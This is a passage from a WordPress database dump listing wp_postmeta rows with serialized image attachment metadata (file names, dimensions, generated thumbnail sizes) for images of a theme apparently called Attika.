:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51599,4322,'_wp_attached_file','2018/08/h7-port-img-6.jpg'),(51600,4322,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:25:\"2018/08/h7-port-img-6.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-6-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h7-port-img-6-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h7-port-img-6-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h7-port-img-6-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:27:\"h7-port-img-6-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h7-port-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51601,4320,'_wp_attachment_image_alt','d'),(51602,1701,'_wp_attachment_image_alt','d'),(51603,1302,'_wp_attachment_image_alt','m'),(51604,4323,'_wp_attached_file','2018/08/h3-team-member.jpg'),(51605,4323,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:26:\"2018/08/h3-team-member.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h3-team-member-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h3-team-member-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h3-team-member-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h3-team-member-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h3-team-member-300x345.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h3-team-member-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51606,1509,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:745;s:6:\"height\";i:2560;s:4:\"file\";s:44:\"2018/08/h3-page-backround-pattern-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"h3-page-backround-pattern-87x300.jpg\";s:5:\"width\";i:87;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-298x1024.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"h3-page-backround-pattern-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-768x2640.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:2640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-447x1536.jpg\";s:5:\"width\";i:447;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-596x2048.jpg\";s:5:\"width\";i:596;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:37:\"h3-page-backround-pattern-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:39:\"h3-page-backround-pattern-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"h3-page-backround-pattern-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-600x2063.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:2063;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"h3-page-backround-pattern-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:37:\"h3-page-backround-pattern-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:38:\"h3-page-backround-pattern-600x2063.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:2063;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"h3-page-backround-pattern-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:29:\"h3-page-backround-pattern.jpg\";}'),(51607,1702,'_wp_attached_file','2018/08/blog-post-img-10.jpg'),(51608,1702,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:645;s:4:\"file\";s:28:\"2018/08/blog-post-img-10.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"blog-post-img-10-1024x508.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-768x381.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"blog-post-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"blog-post-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51609,4323,'_wp_attachment_image_alt','x'),(51610,1364,'_wp_attached_file','2018/08/h5-bacground-img-scaled.jpg'),(51611,4321,'_wp_attachment_image_alt','j'),(51612,4321,'portfolio_single_masonry_image_size',''),(51613,4321,'image_gallery_masonry_image_size','large-width'),(51614,4324,'_wp_attached_file','2018/08/h6-img-6a.jpg'),(51615,4324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-6a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-6a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-6a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-6a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-6a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51616,1364,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:894;s:6:\"height\";i:2560;s:4:\"file\";s:35:\"2018/08/h5-bacground-img-scaled.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h5-bacground-img-105x300.jpg\";s:5:\"width\";i:105;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-357x1024.jpg\";s:5:\"width\";i:357;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h5-bacground-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-768x2200.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:2200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-536x1536.jpg\";s:5:\"width\";i:536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-715x2048.jpg\";s:5:\"width\";i:715;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"h5-bacground-img-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:30:\"h5-bacground-img-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h5-bacground-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-600x1719.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1719;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h5-bacground-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h5-bacground-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"h5-bacground-img-600x1719.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1719;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h5-bacground-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:20:\"h5-bacground-img.jpg\";}'),(51617,4322,'_wp_attachment_image_alt','m'),(51618,4325,'_wp_attached_file','2018/08/h3-img-gallery-3.jpg'),(51619,1702,'_wp_attachment_image_alt','d'),(51620,4325,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:550;s:6:\"height\";i:550;s:4:\"file\";s:28:\"2018/08/h3-img-gallery-3.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"h3-img-gallery-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"h3-img-gallery-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51621,4326,'_wp_attached_file','2018/08/h7-port-img-3.jpg'),(51622,4326,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:25:\"2018/08/h7-port-img-3.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h7-port-img-3-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:26:\"h7-port-img-3-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:26:\"h7-port-img-3-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h7-port-img-3-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:27:\"h7-port-img-3-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h7-port-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h7-port-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"